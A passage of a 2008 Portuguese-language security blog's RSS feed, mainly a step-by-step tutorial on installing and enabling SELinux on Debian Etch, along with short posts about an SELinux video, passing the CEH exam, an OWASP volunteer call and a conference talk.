<p>[1] &#8211; <a href="http://www.remote-exploit.org/backtrack.html">http://www.remote-exploit.org/backtrack.html</a><br />[2] &#8211; <a href="http://www.slax.org">http://www.slax.org</a><br />[3] &#8211; <a href="http://www.linux-live.org">http://www.linux-live.org</a><br />[4] &#8211; <a href="http://wiki.remote-exploit.org">http://wiki.remote-exploit.org</a></p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/ulissescastro.wordpress.com/31/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/ulissescastro.wordpress.com/31/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/ulissescastro.wordpress.com/31/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/ulissescastro.wordpress.com/31/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/ulissescastro.wordpress.com/31/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/ulissescastro.wordpress.com/31/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/ulissescastro.wordpress.com/31/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/ulissescastro.wordpress.com/31/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/ulissescastro.wordpress.com/31/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/ulissescastro.wordpress.com/31/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/ulissescastro.wordpress.com/31/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/ulissescastro.wordpress.com/31/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ulissescastro.wordpress.com&blog=2380205&post=31&subd=ulissescastro&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://ulissescastro.wordpress.com/2008/06/10/saiu-backtrack-3-pre-final-irc-version/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/38efa560b5626bd38456fa15af48a004?s=96&#38;d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D96" medium="image">
			<media:title type="html">thebug</media:title>
		</media:content>

		<media:content url="http://ulissescastro.files.wordpress.com/2008/06/bt3prefinal.png" medium="image" />
	</item>
		<item>
		<title>Video: SELinux em poucos minutos</title>
		<link>http://ulissescastro.wordpress.com/2008/06/07/video-selinux-em-poucos-minutos/</link>
		<comments>http://ulissescastro.wordpress.com/2008/06/07/video-selinux-em-poucos-minutos/#comments</comments>
		<pubDate>Sat, 07 Jun 2008 04:21:32 +0000</pubDate>
		<dc:creator>ulissescastro</dc:creator>
				<category><![CDATA[Debian]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[SELinux]]></category>
		<category><![CDATA[Video]]></category>

		<guid isPermaLink="false">http://ulissescastro.wordpress.com/2008/06/07/video-selinux-em-poucos-minutos/</guid>
		<description><![CDATA[Fazendo um gancho com o post anterior&#8230;
Aproveitando para aprender a criar videos, tarefa que diga-se de passagem foi bem chata para acertar o formato, tamanho, codec, música, programa&#8230;
Disponibilizo meu primeiro video &#8220;SELinux em poucos minutos&#8220;, como  demonstro no video é possível deixar instalado e pronto para uso facilmente.

Agora que acertei como gravar videos espero [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ulissescastro.wordpress.com&blog=2380205&post=28&subd=ulissescastro&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>Fazendo um gancho com o post anterior&#8230;</p>
<p>Aproveitando para aprender a criar videos, tarefa que diga-se de passagem foi bem chata para acertar o formato, tamanho, codec, música, programa&#8230;</p>
<p>Disponibilizo meu primeiro video &#8220;<strong>SELinux em poucos minutos</strong>&#8220;, como  demonstro no video é possível deixar instalado e pronto para uso facilmente.</p>
<p><span style="text-align:center; display: block;"><a href="http://ulissescastro.wordpress.com/2008/06/07/video-selinux-em-poucos-minutos/"><img src="http://img.youtube.com/vi/FLPx7HLLteI/2.jpg" alt="" /></a></span></p>
<p>Agora que acertei como gravar videos espero ter tempo para criar diversos videos, tanto sobre SELinux como hacking em geral.</p>
<p>Sintam-se a vontade para criticar! :)</p>
<p>Amplexos! (by Guidolin)</p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/ulissescastro.wordpress.com/28/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/ulissescastro.wordpress.com/28/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/ulissescastro.wordpress.com/28/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/ulissescastro.wordpress.com/28/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/ulissescastro.wordpress.com/28/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/ulissescastro.wordpress.com/28/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/ulissescastro.wordpress.com/28/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/ulissescastro.wordpress.com/28/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/ulissescastro.wordpress.com/28/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/ulissescastro.wordpress.com/28/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/ulissescastro.wordpress.com/28/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/ulissescastro.wordpress.com/28/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ulissescastro.wordpress.com&blog=2380205&post=28&subd=ulissescastro&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://ulissescastro.wordpress.com/2008/06/07/video-selinux-em-poucos-minutos/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/38efa560b5626bd38456fa15af48a004?s=96&#38;d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D96" medium="image">
			<media:title type="html">thebug</media:title>
		</media:content>

		<media:content url="http://img.youtube.com/vi/FLPx7HLLteI/2.jpg" medium="image" />
	</item>
		<item>
		<title>Instalação e Ativação SELinux no Debian</title>
		<link>http://ulissescastro.wordpress.com/2008/05/30/instalacao-e-ativacao-selinux-no-debian/</link>
		<comments>http://ulissescastro.wordpress.com/2008/05/30/instalacao-e-ativacao-selinux-no-debian/#comments</comments>
		<pubDate>Fri, 30 May 2008 20:47:57 +0000</pubDate>
		<dc:creator>ulissescastro</dc:creator>
				<category><![CDATA[Conference]]></category>
		<category><![CDATA[Debian]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[SELinux]]></category>

		<guid isPermaLink="false">http://ulissescastro.wordpress.com/2008/05/30/instalacao-e-ativacao-selinux-no-debian/</guid>
		<description><![CDATA[Em meus estudos sobre SELinux não encontrei material em português mostrando de forma prática como se instala o SELinux no Debian, abaixo demonstro da maneira mais simples possível como fazer.
Apesar deste tutorial falar de como instalar no Debian Etch é possível aplicá-lo também no Lenny.
Na próxima versão estável do Debian muitas novas funcionalidades estão sendo [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ulissescastro.wordpress.com&blog=2380205&post=18&subd=ulissescastro&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>Em meus estudos sobre SELinux não encontrei material em português mostrando de forma prática como se instala o SELinux no Debian, abaixo demonstro da maneira mais simples possível como fazer.</p>
<p>Apesar deste tutorial falar de como instalar no Debian Etch é possível aplicá-lo também no Lenny.</p>
<p>Na próxima versão estável do Debian muitas novas funcionalidades estão sendo aplicadas aos programas que trabalham no &quot;user-space&quot;, pois não basta ter o SELinux compilado dentro do kernel e ativá-lo é preciso que as ferramentas que o manipulam estejam preparadas para interargir.</p>
<p>Considerando que você já está com uma instalação padrão do Debian Etch, instale os seguintes pacotes:</p>
<p># aptitude install selinux-basics selinux-policy-refpolicy-targeted</p>
<p>O Debian vai resoler as dependências e encarregar-se de instalar mais alguns pacotes que auxiliam na administração do SELinux.</p>
<p>Para ajustar e finalizar as configurações e deixar o SELinux funcionando é interessante utilizar o aplicativo &quot;check-selinux-installation&quot; é um programa desenvolvido em python que auxilía a instalação criando uma &quot;check-list&quot; com dicas de como proceder para finalizar a configuração do SELinux.</p>
<p># check-selinux-installation<br />getfilecon: getfilecon(/proc/1) failed<br />SELinux is not enabled.<br />Could not read the domain of PID 1.<br />Old style ttys were found.<br />/etc/pam.d/ssh is not SELinux enabled<br />/etc/pam.d/login is not SELinux enabled<br />Dynamic motd updating is enabled<br />A dynamic MOTD is present in /var/run/motd.<br />FSCKFIX is not enabled &#8211; not serious, but could prevent system from booting&#8230;</p>
<p>Abaixo o que é necessário para &quot;zerar&quot; esta lista. Vou começar removendo terminais antigos &quot;Old style ttys were found.&quot;</p>
<p># rm -f /dev/[tp]ty[abcdepqrstuvwxyz][0-9a-f]</p>
<p>Para ativar as configurações do pam &quot;/etc/pam.d/ssh&quot; e &quot;/etc/pam.d/login&quot; basta editar os arquivos e descomentar.</p>
<p>No arquivo /etc/pam.d/login procure pela entrada abaixo e descomente.</p>
<p>session required pam_selinux.so multiple</p>
<p>No arquivo /etc/pam.d/ssh procure pela entrada abaixo, descomente e remova a opção multiple:</p>
<p>session required pam_selinux.so</p>
<p>O &quot;Message of the Day&quot; (motd)  é atualizado dinâmicamente para isto precisamos definir um motd estático.</p>
<p># rm -f /etc/motd /var/run/motd</p>
<p>Crie um novo com uma mesnagem qualquer:</p>
<p># echo -ne &quot;Bem vindo.\n&quot; &gt;&gt; /etc/motd</p>
<p>Modifique o arquivo /etc/init.d/bootmisc.sh, procure pelas entradas abaixo e comente-as.</p>
<p># Update motd<br /># uname -snrvm &gt; /var/run/motd<br /># [ -f /etc/motd.tail ] &amp;&amp; cat /etc/motd.tail &gt;&gt; /var/run/motd</p>
<p>Para solucionar este item &quot;FSCKFIX is not enabled&quot; no arquivo /etc/default/rcS existe a seguinte entrada &quot;FSCKFIX=no&quot; modifique para yes, isto modifica o tipo de ação que o Debian toma quando executa um fsck durante o boot tirando a opção (-a) menos segura quando tentar reparar um disco em relação a (-y).</p>
<p>FSCKFIX=yes</p>
<p>Apesar de que a variável abaixo não está sendo mais utilizada neste arquivo (/etc/default/rcS), se não à inserirmos como abaixo, devido a um bug nos scripts de checagem do &quot;check-selinux-installation&quot; ele retornará &quot;Dynamic motd updating is enabled&quot;, para resolver adicione a entrada abaixo só para termos um &quot;check-list&quot; sem nenhuma reclamação.</p>
<p>EDITMOTD=no</p>
<p>Salve o arquivo.</p>
<p>SELinux vem compilado dentro do kernel do Debian por padrão, mas não é ativado, para isto é preciso passar para o kenrel na inicialização o parâmetro selinux=1. Edite o arquivo de configuração do seu gerenciador de boot (grub/lilo) e adicione o parâmetro, abaixo demostro como ficaria no grub.</p>
<p>title Debian GNU/Linux, kernel 2.6.18-6-686<br />root (hd0,0)<br />kernel /boot/vmlinuz-2.6.18-6-686 root=/dev/sda1 ro selinux=1<br />initrd /boot/initrd.img-2.6.18-6-686<br />savedefault</p>
<p>Para que o SELinux aplique seu conceito MAC(Mandatory Access Control) é preciso aplicar o contexto para todos os arquivos do sistema. Para isto tanto com o comando &quot;fixfiles relabel&quot; como adicionando um arquivo vazio na raiz com o nome de &quot;.autorelabel&quot; e executando um reboot.</p>
<p># touch /.autorelabel</p>
<p># fixfiles relabel</p>
<p> Files in the /tmp directory may be labeled incorrectly, this command<br /> can remove all files in /tmp. If you choose to remove files from /tmp,<br /> a reboot will be required after completion.</p>
<p> Do you wish to clean out the /tmp directory [N]? N<br />/sbin/setfiles: labeling files under /<br />matchpathcon_filespec_eval: hash table stats: 23509 elements, 17216/65536 buckets used, longest chain length 3<br />/sbin/setfiles: Done.</p>
<p>Repare que o comando fixfiles pergunta se quer remover todos os arquivos do diretório tmp, responda NÃO pois a remoção dos arquivos do /tmp podem causar inconsistências a programas que já estão em execução. Utilize a opção de criação do arquivos pois de qualquer forma é preciso reinciar o sistema para que o SELinux fique ativado.</p>
<p>Um detalhe importante é que alguns programas após a ativação do SELinux se estiver utilizando a política targeted podem gerar diversos avisos no seu /var/log/messages, os passos abaixos são necessários para evitar essas mensagens&#8230;.</p>
<p>Edite o arquivo de configuração do udev &quot;/etc/udev/udev.conf&quot; e acrescente ao final:</p>
<p>no_static_dev=&quot;1&quot;</p>
<p>Isso evita que o udev crie o diretório &quot;/dev/.static&quot;. Para atualizar as &quot;initial ramdisk images&quot;:</p>
<p># update-initramfs -k all -u</p>
<p>O pacote findutils que traz o comando locate executa um script que varre todo o sistema operacional para indexá-lo, desatvie o script que faz esta varredura pois traz diversas mensagens no /var/log/messages quando é executado. Ainda não existe uma política para que sua execução ocorra de forma efetiva e sem mensagens.</p>
<p>Para desativar edite o arquivo &quot;/etc/cron.daily/find&quot; e na segunda linha acrescente um &quot;exit 0&quot;.</p>
<p>Outro que pode nos trazer problemas e muitas mensagens é o arquivo responsável por fazer periódicamente um backup de alguns arquivos chave do sistema operacional (/etc/shadow, /etc/gshadow, /etc/passwd), edite o arquivo &quot;/etc/cron.daily/standard&quot; e procure pela entrada &quot;Backup key system files&quot; e comente todo o bloco:</p>
<p>#<br /># Backup key system files<br />#<br />#<br />#if cd $bak ; then<br /># cmp -s passwd.bak /etc/passwd || (cp -p /etc/passwd passwd.bak &amp;&amp;<br /># chmod 600 passwd.bak)<br /># cmp -s group.bak /etc/group || (cp -p /etc/group group.bak &amp;&amp;<br /># chmod 600 group.bak)<br /># if [ -f /etc/shadow ] ; then<br /># cmp -s shadow.bak /etc/shadow || (cp -p /etc/shadow shadow.bak &amp;&amp;<br /># chmod 600 shadow.bak)<br /># fi<br /># if [ -f /etc/gshadow ] ; then<br /># cmp -s gshadow.bak /etc/gshadow || (cp -p /etc/gshadow gshadow.bak &amp;&amp;<br /># chmod 600 gshadow.bak)<br /># fi<br />#fi</p>
<p>Agora reinicie a máquina e após execute para verificar  sua instlação:</p>
<p># check-selinux-installation</p>
<p>Provavelmente não retornará nada pode checar com um &quot;echo $?&quot;, e também:</p>
<p># sestatus<br />SELinux status: enabled<br />SELinuxfs mount: /selinux<br />Current mode: permissive<br />Mode from config file: permissive<br />Policy version: 20<br />Policy from config file: refpolicy-targeted</p>
<p>Como pode ver na saida dos comandos o SELinux está instalado corretamente e no modo permissive que é um modo onde o SELinux não nega as requisições aos arquivos/dispositivos/processos com base nos contextos somente gera um log no arquivo /var/log/messages.</p>
<p>Nos próximos posts sobre SELinux pretendo mostrar de forma prática como utilizá-lo para blindarmos nosso sistema operacional e aumentar considrávelmente a segurança.</p>
<p>Obrigado e até o próximo! ;-)</p>
<p>Referências</p>
<p><a href="http://wiki.debian.org/SELinux">http://wiki.debian.org/SELinux</a><br /><a href="http://etbe.blogspot.com/2006/12/se-linux-on-debian-in-5-minutes.html">http://etbe.blogspot.com/2006/12/se-linux-on-debian-in-5-minutes.html</a><br /><a href="http://www.coker.com.au/selinux/tweaks.html">http://www.coker.com.au/selinux/tweaks.html</a></p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/ulissescastro.wordpress.com/18/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/ulissescastro.wordpress.com/18/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/ulissescastro.wordpress.com/18/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/ulissescastro.wordpress.com/18/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/ulissescastro.wordpress.com/18/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/ulissescastro.wordpress.com/18/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/ulissescastro.wordpress.com/18/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/ulissescastro.wordpress.com/18/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/ulissescastro.wordpress.com/18/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/ulissescastro.wordpress.com/18/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/ulissescastro.wordpress.com/18/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/ulissescastro.wordpress.com/18/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ulissescastro.wordpress.com&blog=2380205&post=18&subd=ulissescastro&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://ulissescastro.wordpress.com/2008/05/30/instalacao-e-ativacao-selinux-no-debian/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/38efa560b5626bd38456fa15af48a004?s=96&#38;d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D96" medium="image">
			<media:title type="html">thebug</media:title>
		</media:content>
	</item>
		<item>
		<title>Passei! CEH &#8211; Certified Ethical Hacker</title>
		<link>http://ulissescastro.wordpress.com/2008/05/26/passei-ceh-certified-ethical-hacker/</link>
		<comments>http://ulissescastro.wordpress.com/2008/05/26/passei-ceh-certified-ethical-hacker/#comments</comments>
		<pubDate>Tue, 27 May 2008 00:55:18 +0000</pubDate>
		<dc:creator>ulissescastro</dc:creator>
				<category><![CDATA[Announce]]></category>
		<category><![CDATA[Certification]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://ulissescastro.wordpress.com/2008/05/26/passei-ceh-certified-ethical-hacker/</guid>
		<description><![CDATA[Eeeeeeeeeeeeeeee \o/ !!!
Consegui! Fiz hoje a prova (cansativa) 150 questões! Precisava de 70% para ser aprovado e &#8230; bom uma imagem vale mais do que mil palavras! ;-)

Logo mais postarei com base em quais materiais estudei, como funciona a prova, o que é exatamente esta certificação, o que fazer para quem se interessar em tirar [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ulissescastro.wordpress.com&blog=2380205&post=13&subd=ulissescastro&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>Eeeeeeeeeeeeeeee \o/ !!!</p>
<p>Consegui! Fiz hoje a prova (cansativa) 150 questões! Precisava de 70% para ser aprovado e &#8230; bom uma imagem vale mais do que mil palavras! ;-)</p>
<p><img height="309" style="margin:5px;" width="458" alt="" src="http://ulissescastro.files.wordpress.com/2008/05/pass013.jpg?w=458&#038;h=309" /></p>
<p>Logo mais postarei com base em quais materiais estudei, como funciona a prova, o que é exatamente esta certificação, o que fazer para quem se interessar em tirar esta certificação!</p>
<p>Para quem estiver com pressa e quiser saber um pouco mais antes do meu post, clique <a href="http://www.eccouncil.org/Course-Outline/Ethical%20Hacking%20and%20Countermeasures%20Course.htm">aqui</a> e veja mais informações com descrição sobre CEH, tópicos cobrados &#8230;</p>
<p>Até mais! :-)</p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/ulissescastro.wordpress.com/13/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/ulissescastro.wordpress.com/13/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/ulissescastro.wordpress.com/13/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/ulissescastro.wordpress.com/13/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/ulissescastro.wordpress.com/13/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/ulissescastro.wordpress.com/13/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/ulissescastro.wordpress.com/13/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/ulissescastro.wordpress.com/13/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/ulissescastro.wordpress.com/13/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/ulissescastro.wordpress.com/13/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/ulissescastro.wordpress.com/13/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/ulissescastro.wordpress.com/13/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ulissescastro.wordpress.com&blog=2380205&post=13&subd=ulissescastro&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://ulissescastro.wordpress.com/2008/05/26/passei-ceh-certified-ethical-hacker/feed/</wfw:commentRss>
		<slash:comments>29</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/38efa560b5626bd38456fa15af48a004?s=96&#38;d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D96" medium="image">
			<media:title type="html">thebug</media:title>
		</media:content>

		<media:content url="http://ulissescastro.files.wordpress.com/2008/05/pass013.jpg" medium="image" />
	</item>
		<item>
		<title>Chamada de Voluntários &#8211; Projeto ASDR</title>
		<link>http://ulissescastro.wordpress.com/2008/05/21/chamada-de-voluntarios-projeto-asdr/</link>
		<comments>http://ulissescastro.wordpress.com/2008/05/21/chamada-de-voluntarios-projeto-asdr/#comments</comments>
		<pubDate>Wed, 21 May 2008 16:24:34 +0000</pubDate>
		<dc:creator>ulissescastro</dc:creator>
				<category><![CDATA[Announce]]></category>
		<category><![CDATA[OWASP]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://ulissescastro.wordpress.com/2008/05/21/chamada-de-voluntarios-projeto-adsr/</guid>
		<description><![CDATA[Galera segue abaixo chamada de voluntários para o projeto ASDR (Application Security Desk Reference) da OWASP, feita por Leonardo Cavallari.
Na íntegra:
&#8220;Olá a todos!
Estamos remodelando o projeto Honeycomb em um guia de referência mais amplo, chamado the Application Security Desk Reference &#8211; ASDR.
O projeto ASDR tem por objetivo reunir referencias completas sobre agentes de ameaças, principios, [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ulissescastro.wordpress.com&blog=2380205&post=11&subd=ulissescastro&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>Galera segue abaixo chamada de voluntários para o projeto <strong>ASDR</strong> (Application Security Desk Reference) da <strong>OWASP</strong>, feita por Leonardo Cavallari.</p>
<p>Na íntegra:</p>
<p><em>&#8220;Olá a todos!</em></p>
<p><em>Estamos remodelando o projeto Honeycomb em um guia de referência mais amplo, chamado the Application Security Desk Reference &#8211; ASDR.</p>
<p>O projeto ASDR tem por objetivo reunir referencias completas sobre agentes de ameaças, principios, ataques, vulnerabilidades, controles, impactos técnicos e de negócios, com o intuito de criar o guia de segurança mais completo que se tenha notícia.</p>
<p>Porém, para alcançar este objetivo precisamos de voluntários que ajudem a desenvolver e revisar os artigos, pois temos mais de 600 artigos para desenvolver/atualizar, sendo que 300 só tem o título.</p>
<p>Pelo fato de acreditar que a comunidade brasileira possa dar mais uma boa contribuição para a OWASP, estou fazendo esta chamada.</p>
<p>Quem tiver interesse em conhecer e participar do projeto, acesse a página ASDR Workplan e me envie um e-mail (leonardocavallari #at# gmail.com) demonstrando como você poderia ajudar.<br />
A idéia é lançar o livro do projeto até 1 de Agosto.</p>
<p>Quem aí tá com disposição?!</p>
<p>Abraços,</p>
<p></em></p>
<p><em>Leo Cavallari&#8221;</em></p>
<p>Acredito ser uma ótima oportunidade para aprender evoluir e contribuir! E que também não deixa de ser uma ótima referência para o curríclo de quem participa!</p>
<p>Conforme informado no e-mail existe um Workplan[1] montado onde o Leonardo já iniciou a distribuição dos tópicos[2], desta forma fica aqui meu convite a todos os interessados em segurança.</p>
<p>Abraços!</p>
<p>1 &#8211; <a href="http://www.owasp.org/index.php/OWASP_ASDR_Workplan">http://www.owasp.org/index.php/OWASP_ASDR_Workplan</a><br />
2 &#8211; <a href="https://www.owasp.org/index.php/ASDR_TOC_Attacks">https://www.owasp.org/index.php/ASDR_TOC_Attacks</a></p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/ulissescastro.wordpress.com/11/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/ulissescastro.wordpress.com/11/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/ulissescastro.wordpress.com/11/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/ulissescastro.wordpress.com/11/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/ulissescastro.wordpress.com/11/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/ulissescastro.wordpress.com/11/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/ulissescastro.wordpress.com/11/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/ulissescastro.wordpress.com/11/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/ulissescastro.wordpress.com/11/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/ulissescastro.wordpress.com/11/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/ulissescastro.wordpress.com/11/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/ulissescastro.wordpress.com/11/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ulissescastro.wordpress.com&blog=2380205&post=11&subd=ulissescastro&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://ulissescastro.wordpress.com/2008/05/21/chamada-de-voluntarios-projeto-asdr/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/38efa560b5626bd38456fa15af48a004?s=96&#38;d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D96" medium="image">
			<media:title type="html">thebug</media:title>
		</media:content>
	</item>
		<item>
		<title>Palestra SELinux APROVADA!</title>
		<link>http://ulissescastro.wordpress.com/2008/05/16/palestra-selinux-aprovada/</link>
		<comments>http://ulissescastro.wordpress.com/2008/05/16/palestra-selinux-aprovada/#comments</comments>
		<pubDate>Fri, 16 May 2008 20:30:54 +0000</pubDate>
		<dc:creator>ulissescastro</dc:creator>
				<category><![CDATA[Announce]]></category>
		<category><![CDATA[Conference]]></category>
		<category><![CDATA[Lecture]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[SELinux]]></category>

		<guid isPermaLink="false">http://ulissescastro.wordpress.com/2008/05/16/palestra-selinux-aprovada/</guid>
		<description><![CDATA[É isso ae minha palestra &#8220;Desmitificando SELINUX&#8221; foi aprovada no 1o. Simpósio Goiâno de Software Livre / 5o. Fórum Goiâno de Software Livre, o evento irá ocorrer nos dias 30 e 31 de maio de 2008.
Breve resumo da palestra
Security Enhanced Linux (SELinux) tem reputação de ser complexo e díficil de implementar, recentemente os desenvolvedores tem [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ulissescastro.wordpress.com&blog=2380205&post=8&subd=ulissescastro&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p align="left">É isso ae minha palestra <strong>&#8220;Desmitificando SELINUX&#8221;</strong> foi aprovada no 1o. Simpósio Goiâno de Software Livre / 5o. Fórum Goiâno de Software Livre, o evento irá ocorrer nos dias 30 e 31 de maio de 2008.</p>
<p align="left"><strong>Breve resumo da palestra</strong></p>
<p align="left"><em>Security Enhanced Linux (SELinux) tem reputação de ser complexo e díficil de implementar, recentemente os desenvolvedores tem trabalhado em sua evolução e facilitação de uso. Isto tem representando num crescimento rápido, fortalecendo diversos tipos de servidores Linux. Esta palestra abordará as suas funcionalidades e desmitificação dos mitos de dificultade de implantação.</em></p>
<p align="left">Maiores informações, local do evento, etc&#8230;</p>
<p align="left"><a href="http://www.sgsl.ueg.br">http://www.sgsl.ueg.br</a></p>
<p>Espero vocês lá!</p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/ulissescastro.wordpress.com/8/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/ulissescastro.wordpress.com/8/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/ulissescastro.wordpress.com/8/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/ulissescastro.wordpress.com/8/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/ulissescastro.wordpress.com/8/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/ulissescastro.wordpress.com/8/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/ulissescastro.wordpress.com/8/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/ulissescastro.wordpress.com/8/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/ulissescastro.wordpress.com/8/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/ulissescastro.wordpress.com/8/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/ulissescastro.wordpress.com/8/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/ulissescastro.wordpress.com/8/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ulissescastro.wordpress.com&blog=2380205&post=8&subd=ulissescastro&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://ulissescastro.wordpress.com/2008/05/16/palestra-selinux-aprovada/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/38efa560b5626bd38456fa15af48a004?s=96&#38;d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D96" medium="image">
			<media:title type="html">thebug</media:title>
		</media:content>
	</item>
		<item>
